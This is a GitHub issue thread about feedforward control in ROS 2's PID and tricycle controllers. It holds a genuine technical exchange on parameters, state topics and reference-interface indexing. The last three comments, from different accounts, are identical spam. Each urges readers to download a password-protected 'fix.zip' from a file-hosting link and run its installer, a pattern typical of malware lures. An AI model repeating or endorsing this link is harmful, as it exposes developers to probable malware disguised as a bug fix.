ros-controls/ros2_controllers #1270: PID controller feedforward control

christophfroehlich, 2024-08-26:
Originally posted in https://github.com/ros-controls/ros2_controllers/issues/1260#issue-2478288460

**Is your feature suggestion related to a problem? Please describe.**
While using the PID controller and tricycle controller, there might be room for improvement in the following areas:

> There seems to be no straightforward method to enable or disable feedforward control.
> The controller state topics (~/controller_state or /pid_state) don't appear to include feedforward gain information.
> The feedforward gain in the PID controller may not work as expected in some cases.
> The tricycle controller might benefit from additional parameters to better support cascaded control scenarios.

**Describe the solution you'd like to see**
For both PID and Tricycle Controllers:

> Consider adding a boolean parameter in the YAML configuration to enable/disable feedforward control, for example:
> `enable_feedforward: true`
> Alternatively, it might be worth considering automatically enabling feedforward control when feedforward_gain is non-zero.
> It could be beneficial to publish feedforward_gain in the ~/controller_state or /pid_state topics.

For PID Controller:

It might be necessary to investigate and address the issue with feedforward_gain application. Currently, in the pid_controller.cpp file (lines 444-445), the result appears to always be 0.000.
A potential fix to consider might be:
`tmp_command= reference_interfaces_[i] * params_.gains.dof_names_map[params_.dof_names[i]].feedforward_gain;`

christophfroehlich, 2024-08-26:
> **Is your feature suggestion related to a problem? Please describe.** While using the PID controller and tricycle controller, there might be room for improvement in the following areas:
>
>
> **Describe [...]

There is already a service for that: `set_feedforward_control`? But your problem is that 

1. it is not default on, even if a feedforward gain is set?
2. you don't have debug info if it is active or not?

> For PID Controller:
>
> It might be necessary to investigate and address the issue with feedforward_gain application. Currently, in the pid_controller.cpp file (lines 444-445), the result appears to [...]

The change you are proposing is removing the `dof_` from the reference interface index?
https://github.com/ros-controls/ros2_controllers/blob/1c4d58e55efd86630451eb615ade5d1f7da7e952/pid_controller/src/pid_controller.cpp#L451-L452

The documentation is a bit cryptic here
https://github.com/ros-controls/ros2_controllers/blob/master/pid_controller/doc/userdoc.rst#execution-logic-of-the-controller

But I think the idea was to have position and velocity references, with velocity command interface. Then the feedforward part is the velocity of the reference (and therefore `dof_+i`)

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

closed 2025-05-17 by christophfroehlich